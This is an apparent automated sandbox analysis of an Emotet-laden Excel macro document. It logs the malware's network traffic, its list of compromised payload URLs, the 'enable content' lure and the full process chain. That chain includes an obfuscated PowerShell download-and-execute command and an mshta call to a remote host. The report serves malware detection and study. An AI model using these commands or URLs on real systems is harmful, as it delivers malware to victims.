Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 91.240.118.172 91.240.118.172

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 19:58:55 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44affaa0ef=1643399935; expires=Fri, 28-Jan-2022 19:59:55 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 19:58:55 GMTExpires: Fri, 28 Jan 2022 19:58:55 GMTContent-Disposition: attachment; filename="Fw6A4ZWhOBNhoQZNE5.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,2

Source: global traffic

HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172

Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comi equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410097515.0000000000380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: imedpub_8.xls.0.dr	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.412420079.000000000285D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.411930557.0000000002855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlr
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.661371984.00000000000C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.410185425.000000000310D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436631636.00000000030E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: hostfeeling.com

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31 32 33 34 35 36 3
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 8	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26

Found malicious Excel 4.0 Macro

Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta

Document contains OLE streams with names of living off the land binaries

Source: imedpub_8.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: imedpub_8.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: imedpub_8.xls	Initial sample: EXEC
Source: imedpub_8.xls	Initial sample: EXEC

Source: imedpub_8.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: 32B4.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE
Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: imedpub_8.xls	OLE indicator, VBA macros: true
Source: imedpub_8.xls.0.dr	OLE indicator, VBA macros: true

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P. .............................P. .....................`I.........v.....................K......(.e.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k....................................}..v....(.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k..... ..............................}..v............0...............(.e.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......e.............................}..v............0.................e.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k......e.............................}..v....@.......0...............8.e.............................

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
